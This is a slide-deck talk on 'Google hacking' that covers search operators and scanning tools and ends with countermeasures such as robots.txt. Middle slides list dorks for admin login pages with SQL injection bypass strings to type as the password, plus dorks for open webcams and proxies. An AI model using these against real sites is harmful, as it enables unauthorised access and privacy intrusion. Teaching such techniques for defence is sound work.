Google and Beyond: Advanced Search Engine Hacking and Web-Based Intelligence Gathering By Manish Kumar Founder & CEO, Rooman Technologies Pvt Ltd
AGENDA • How Google works • Information disclosure with Google • Tools • Countermeasures
Google Hacking Web Hacking: Pick a site, find the vulnerability Google Hacking : Pick a vulnerability, find the site. Don’t Be A Target of Opportunity
How Google Works • Googlebot, • a web crawler that finds and fetches web pages. • The indexer • that sorts every word on every page and stores the resulting index of words in a huge database. • The query processor • which compares your search query to the index and recommends the documents that it considers most relevant.
How Google Works CLIENT SIDE SERVER SIDE
How Googlebot Works Googlebot finds pages in two ways • through an add URL form, www.google.com/addurl.html • through finding links by crawling the web.
Indexer and Query Processor • Indexer • Googlebot gives the indexer the full text of the pages it finds. These pages are stored in Google’s index database in alphabetic order. • each index entry store a list of documents in which the term appears and the location within the text where it occurs. • Query Processor • Page Ranking puts more important pages at high rank. • Intelligent Technique for learning relationships and associations within the stored data • Spelling Correcting System
So What Determines Page Relevance and Rating? • Exact Phrase: • are your keywords found as an exact phrase in any pages? • Adjacency: • how close are your keywords to each other? • Weighting: • how many times do the keywords appear in the page? • PageRank/Links: • How many links point to the page? How many links are actually in the page. Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)
The Basics • To set the stage for what I will demo, it is necessary to understand some of Google’s advanced search functions. • This will not be an exhaustive list, just an intro. • Creative use of these functions is the key to successful Google Hacking.
The Basics • Some important things to keep in mind • Google queries are not case sensitive. • The * wildcard represents any word • Example: “* insurance quote” • Google stems words automatically • Example: “automobile insurance quote” brings up sites with “auto … “.
The Basics • The + symbol forces inclusion of a certain word. • “auto insurance +progressive” • The - symbol forces exclusion of a certain word. • (Site:progressive.com –site:www.progressive.com) • The | symbol provides boolean OR logic. • “auto insurance + inurl:(progressive | geico)”
Information Disclosure with Google • Advanced Search Operators • site: (.edu, .gov, foundstone.com, usc.edu) • filetype: (txt, xls, mdb, pdf, .log) • Daterange: (julian date format) • Intitle / allintitle • Inurl / allinurl
Advanced Operators • link:URL= lists other pages that link to the URL. • related:URL = lists other pages that are related to the URL. • site:domain.com “search term” = restricts search results to the given domain. • allinurl:WORDS = shows only pages with all search terms in the url. • inurl:WORD = like allinurl: but filters the URL based on the first term only. • allintitle:WORD = shows only results with terms in title. • intitle:WORD = similar to allintitle, but only for the next word. • cache:URL = will show the Google cached version of the URL.
The Basics • Let’s take a look at a few of the interesting Google search commands.
The Basics • There are many more advanced operators. • Combining these creatively is the key to Google Hacking. • http://www.googleguide.com/advanced_operators_reference.html BUT DO YOU REALLY NEED TO REMEMBER IT
INTERESTING SEARCHES… Now that we’ve gotten this boring stuff out of the way, let’s introduce some Google hacks.
Google and Proxy • Use www.google.com/translate_t to by-pass Internet Browser Security Settings. • Find a proxy that works, and enter in the URL • inurl:”nph-proxy.cgi” “start using cgiproxy” • inurl:”nph-proxy.cgi” “Start browsing through this CGI-based proxy”
Gaining auth bypass on an admin account • There is a large number of google dork for basic sql injection • "inurl:admin.asp" • "inurl:login/admin.asp" • "inurl:admin/login.asp" • "inurl:adminlogin.asp" • "inurl:adminhome.asp" • "inurl:admin_login.asp" • "inurl:administratorlogin.asp" • "inurl:login/administrator.asp" • "inurl:administrator_login.asp"
SQL Injection Keep the username as "Admin“ and for password type one of the following " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 – blah’ 'or'1=1' • ' or '1'='1 • ' or 'x'='x • ' or 0=0 -- • " or 0=0 -- • or 0=0 -- • ' or 0=0 # • " or 0=0 # • or 0=0 # • ' or 'x'='x • " or "x"="x • ') or ('x'='x • ' or 1=1--
Few more interesting Searches • Browsing images of the site • Site: xxxxxxx in Google image • Browse Live Video Cameras • inurl:”viewerframe?mode=motion” (http://22.214.171.124:555/ViewerFrame?Mode=Motion&Language=0) • Intitle:”Live View / - AXIS” • Browse Open Webcams Worldwide • Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml • Cannon Webcams: sample/LvAppl/ • Server versioning • intitle:index.of “server at”
Tools • Google Hacks • Goolag Site Scanner • Site Digger • Gooscan • Goolink Scanner • Athena
GOOGLE HACK • Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services • You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches • You can also use this program to use google as a proxy
GOOLAG SCANNER • Goolag Scanner enables everyone to audit his/her own web site via Google • It uses one xml-based configuration file for its settings
SITEDIGGER • Automated Google hacking tool from Foundstone • Uses Google API • Uses Google Hacking Database • SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on websites
Countermeasures • Keep sensitive data off the web!! • Do not display detailed Error Message • Do not allow Directory Browsing • Perform periodic Google Assessments • Update robots.txt (For examples and suggestions for using a robots.txt file, see http://www.robotstxt.org) • Use meta-tags: NOARCHIVE • http://www.google.com/remove.html.
How To Protect Your Websites From Google Hackers • Use a robots.txt file to prevent Google and other search engines from crawling your site if it shouldn’t be crawled.
ROBOTS.TXT Example • This example allows all robots to visit all files because the wildcard "*" specifies all robots: • User-agent: * • Disallow: • This example keeps all robots out: • User-agent: * • Disallow: / • The next is an example that tells all crawlers not to enter four directories of a website: • User-agent: * • Disallow: /cgi-bin/ Disallow: /images/ Disallow: /tmp/ Disallow: /private/
Robots.txt Cont.. • Example that tells a specific crawler not to enter one specific directory: • User-agent: BadBot # replace the 'BadBot' with the actual user-agent of the bot • Disallow: /private/ • Example that tells all crawlers not to enter one specific file: • User-agent: * • Disallow: /directory/file.html • Note that all other files in the specified directory will be processed. • Example demonstrating how comments can be used: • # Comments appear after the "#" symbol at the start of a line, or after a directive User-agent: * # match all bots Disallow: / # keep them out
Few interesting Websites • www.archive.org • Archive of websites (Time Machine) • www.readnotify.com • Find out when your email gets read, Retract, Certify, Track & much more • www.guerrillamail.com • (provides you with disposable e-mail addresses which expire after 15 Minutes. • www.gorillaemail.com • Email Marketing solutions that allows you to Send, Track and Confirm delivery of Emails, Newsletters, Events etc.
QUESTIONS ???? THANK YOU Manish Kumar, CEO, Rooman Technologies Email: firstname.lastname@example.org Ph: 080-40445566